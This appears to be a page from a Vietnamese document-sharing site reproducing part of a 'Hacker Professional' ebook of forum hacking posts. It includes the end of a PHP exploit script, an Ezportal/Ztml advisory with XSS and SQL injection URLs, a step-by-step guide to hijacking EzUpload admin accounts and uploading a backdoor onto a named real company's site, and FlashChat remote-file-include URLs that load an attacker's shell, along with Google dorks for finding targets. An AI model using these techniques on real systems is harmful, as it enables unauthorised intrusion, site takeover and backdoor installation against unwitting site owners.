1. Trang chủ
  2. » Công Nghệ Thông Tin

Hacker Professional Ebook part 373 potx

6 85 0

Đang tải... (xem toàn văn)

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Định dạng
Số trang 6
Dung lượng 94,73 KB

Nội dung

sendpacket($packet); if (strstr($html,"Hauru")) { $temp=explode("Hauru",$html); die($temp[1]); } } echo "Exploit err0r :(\n"; echo "Check register_globals = On and magic_quotes_gpc = off\n"; echo "Go to DEVIL TEAM IRC: irc.milw0rm.com:6667 #devilteam\r\n"; ?> black_hat_cr(HCE) Ezportal/Ztml v1.0 Multiple vulnerabilities Topic : Ezportal/Ztml v1.0 Multiple vulnerabilities SecurityAlert Id : 1481 CVE : CVE-2006-4502 CVE : CVE-2006-4501 CVE : CVE-2006-4500 SecurityRisk : Medium Remote Exploit : Yes Local Exploit : No Exploit Given : Yes Credit : Hessamx hessamx net Date : 2.9.2006 Affected Software : Ezportal/Ztml v1.0 Advisory Text : :: Ezportal/Ztml v1.0 Multiple vulnerabilities :: Software : Ezportal/Ztml Website : http://www.ztml.org Bug Discover : Hessam-x / www.hessamx.net I. Multiple Cross Site Scripting Vulnerabilities Parameters : About , Again , Lastname , Email , password , album, id , table , desc , doc , mname , max , htpl ,pheader , & more are not properly sanitized in "Index.php". This can be used to post arbitrary HTML or web script code. Attacker can be execute this url : index.php?about=[XSS] index.php?username=GUEST&again=[XSS] & II. SQL Injection Vulnerabilities Parameters: about , album , id , use , desc , doc , max , mname , & Other is not properly sanitized before being used in SQL query. vulnerable Page is : "index.php". This can be used make any SQL query by injecting arbitrary SQL code. Attacker can be execute this url : index.php?about=[SQL Query]&use=ezportal.home.about.this.template index.php?doc=[SQL Query]&etpl=ezp.home.update.status&ukey=_zdoc.zdoc.group & other III. Authentication Bypass Vulnerability "Administration Area" script has no any authentication. Any user can get access to administrator's area.Just need to know script name black_hat_cr(HCE) EzUpload multi file vulnerabilities Bài này của lão H2P bên VBF ! Thấy hay post Anh em dùng chơi Cái này sau khi chiếm Admin upload backdoor local hơi sướng ! Hôm nay mới public trên Securityforcus Anh em nhanh chân nhé ! http://www.securityfocus.com/bid/19175 EzUpload la một chương trình trao đổi file khá hay, tuy nhiên nó có lỗi rất nguy hiểm. Nhiều file bị lỗi nghiêm trọng giúp attacker có thể chiếm quyền, upload những mã nguy hiểm. Các file bị lỗi: http://www.securityfocus.com/archive /30/0/threaded Bắt đầu nhé: - Download file đính kèm. - Tìm mục tiêu: Vào google.com search keyword: allinurl: "ezupload" nó ra quá trời kết quả và dĩ nhiên tại thời điểm này gần 100% có thể khai thác. - Khai thác: Như đã nói ở trên (http://www.securityfocus.com/archive /30/0/threaded) có 5 file dính lỗi nên có nhiều cách khai thác nhưng tôi chỉ hướng dẫn cách "làm admin" khi được làm admin rồi thì không cần biết các cách khác nữa. a. Lấy password admin VD chọn thằng ku: http://handledwithcarecards.com/ezupload để thử. Đây là một server riêng của một công ty. Dùng notepad mở file change pass.htm tìm dòng <form method="post" action="handledwithcarecards.com/ezupload/settings.php"> thay cho phù hợp trong trường hợp này để nguyên <form method="post" action="http://handledwithcarecards.com/ezupload/settings.php"> Save lại và chạy nó. Ô thứ 3 và thứ 4 (Admin Password) nhập password mới vào (5 ký tự trở lên), các ô khác bỏ trống. Nhấn Save Changes và chờ nó chuyển đến một trang xấu hoắc có mỗi cái form nhập pass. Nhập cái password của ta vào. OK và Control của nó rồi. b. Re-config. - Nhấn thẻ Filter: Đánh dấu vào radio trên cùng All file extensions (not recommended) nhấn Save Changes . Cái này sẽ chấp nhận upload tất cả các loại file, làm nhu vậy ta mới có thể upload php/cgi/asp backdoor. - Nhấn thẻ Access Control: Đánh dấu vào radio trên cùng Allows everyone to access the upload form nhấn submit. Cái này sẽ chấp nhận anyone upload mà không cần đăng nhập. c. Upload backdoor hoặc file làm bằng chứng đột nhập. Vô http://handledwithcarecards.com/ezupload để upload backdoor lên. Vào lại Admin nhấn thẻ Browse để tìm url của con backdoor vừa upload. Chạy nó và đọc bài Local Attack để tiếp tục. Xong. Xin đừng quậy phá. File Kèm Theo change pass.zip (3.3 KB, 18 l ầ n t ả i) getrootvn(HCE) FlashChat<=4.5.7 <<Remote File Include Code: http://site.com/[script_path]/inc/cmses/aedating4CMS.php?dir[inc]=http://địa chỉ con shell http://site.com/[script_path]/inc/cmses/aedatingCMS2.php?dir[inc]=http://địa chỉ con shell http://site.com/[script_path]/inc/cmses/aedatingCMS.php?dir[inc]=http://địa chỉ con shell? ok, bug remote file include kiếm những site xài cái này trong google với: Code: inurl:/inc/cmses/aedating4CMS.php

Ngày đăng: 04/07/2014, 12:20

TÀI LIỆU CÙNG NGƯỜI DÙNG

  • Đang cập nhật ...

TÀI LIỆU LIÊN QUAN